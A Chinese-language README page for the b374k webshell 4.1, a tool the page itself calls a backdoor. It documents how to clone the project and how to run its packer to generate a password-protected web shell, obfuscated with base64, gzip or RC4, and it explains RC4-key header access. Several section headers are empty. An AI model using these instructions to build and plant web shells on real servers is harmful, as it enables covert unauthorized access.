Home

Awesome

b374k webshell 4.1

b374k webshell是一个非常实用的web管理工具(后门),所有的管理操作都通过HTTP协议进行。

特性 :

需求 :

安装 :

b374k shell是一个可装卸的模块化webshell,你需要进行一些简单的配置,才可以生成webshell文件。

下载b374k项目,你可以在命令行下运行index.php,查看其帮助文档:

git clone https://github.com/phith0n/b374k.git
cd b374k
php -f index.php -- --help

命令行参数说明:

$ php -f index.php
b374k shell packer 0.4

options :
        -o filename                             指定生成文件名
        -p password                             指定webshell密码
        -t theme                                指定皮肤
        -m modules                              指定模块,多个模块间用英文逗号分隔
        -s                                      是否清楚空白字符和注释
        -b                                      是否使用base64编码
        -z [no|gzdeflate|gzencode|gzcompress|rc4]   使用哪个压缩方式(需要开启 -b)
        -c [0-9]                                压缩等级
        -l                                      列出所有可用的模块
        -k                                      列出所有可用的皮肤
        -u code                                 指定目标系统编码,如gb2312/utf-8等,默认utf-8

例子:

php -f index.php -- -o myShell.php -p myPassword -s -b -z gzcompress -c 9

或者,你可以直接从浏览器访问index.php,使用图形化界面生成你的webshell:

请不要在生成环境使用这个webshell,使用完成后删除所有文件。因为该webshell是一个后门,所以并没有安全防范措施。(特别是index.php,不要让他人访问到了,切记)

使用RC4加密webshell

如果你使用了RC4加密方法(-z rc4),那么在生成webshell的时候,请记下RC4 Cipher Key:

在访问该shell的时候需要带上RC4-KEY头:

否则将无法正常访问该shell。

开发文档 :

升级日志 :

老版本 :